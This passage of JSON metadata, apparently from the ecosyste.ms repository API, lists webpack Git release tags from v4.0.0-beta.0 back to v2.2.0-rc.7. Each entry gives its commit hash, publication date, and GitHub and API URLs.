c62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.